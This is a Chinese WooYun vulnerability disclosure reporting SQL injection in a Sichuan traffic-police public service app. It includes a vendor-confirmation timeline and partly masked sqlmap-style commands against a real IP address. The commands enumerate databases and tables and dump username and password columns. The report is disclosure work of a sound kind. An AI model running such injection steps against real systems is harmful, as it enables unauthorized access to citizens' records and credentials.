某省敏感部门公共服务平台app SQL注入 | wooyun-2015-0101288

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0101288

漏洞标题：

某省敏感部门公共服务平台app SQL注入

漏洞详情

披露状态：

2015-03-16：细节已通知厂商并且等待厂商处理中
2015-03-17：厂商已经确认，细节仅向厂商公开
2015-03-27：细节向核心白帽子及相关领域专家公开
2015-04-06：细节向普通白帽子公开
2015-04-16：细节向实习白帽子公开
2015-05-01：细节向公众公开

简要描述：

源自app的SQL注入

详细说明：

mask 区域

*****一款交警业务办理手机应用。四川交警公共服务平台^*****
**********
*****^^^*****
1.://**.**.**//61.139.124.138/mapp</code>_
**********
*****^web api请求时^*****
2.://**.**.**//61.139.124.138/api/wap-m/detail.phpid=3069</code>

漏洞证明：

mask 区域

*****^数^*****
**********
1.://**.**.**//61.139.124.138/api/wap-m/detail.php\id\=3069 --dbs</code>_
**********
*****下9^*****
*****be91f7e8cd7380c91228.png&qu*****
**********
*****chejian，*****
2.://**.**.**//61.139.124.138/api/wap-m/detail.php\id\=3069 -D chejian --tables</code>_
*****^^的*****
*****b3f00291fa28aa804a.png"*****
**********
*****s表中^*****
3.://**.**.**//61.139.124.138/api/wap-m/detail.php\id\=3069 -D chejian -T users --columns_
*****de&g*****
*****4b87bd33e50e100102d9.png&qu*****
**********
*****sernam*****
4.://**.**.**//61.139.124.138/api/wap-m/detail.php\id\=3069 -D chejian -T users -C username --dump_
*****de&g*****
*****db51974c7640c82690.png"*****
**********
*****asswor*****
5.://**.**.**//61.139.124.138/api/wap-m/detail.php\id\=3069 -D chejian -T password -C  --dump</code>_
*****48478b40f735d50717.png"*****
**********
*****^^^*****

修复方案：

过滤

版权声明：转载请注明来源小荷才露尖尖角@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2015-03-17 14:33

厂商回复：

验证确认所描述的问题，已通知其修复。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源小荷才露尖尖角@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 小荷才露尖尖角@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源小荷才露尖尖角@乌云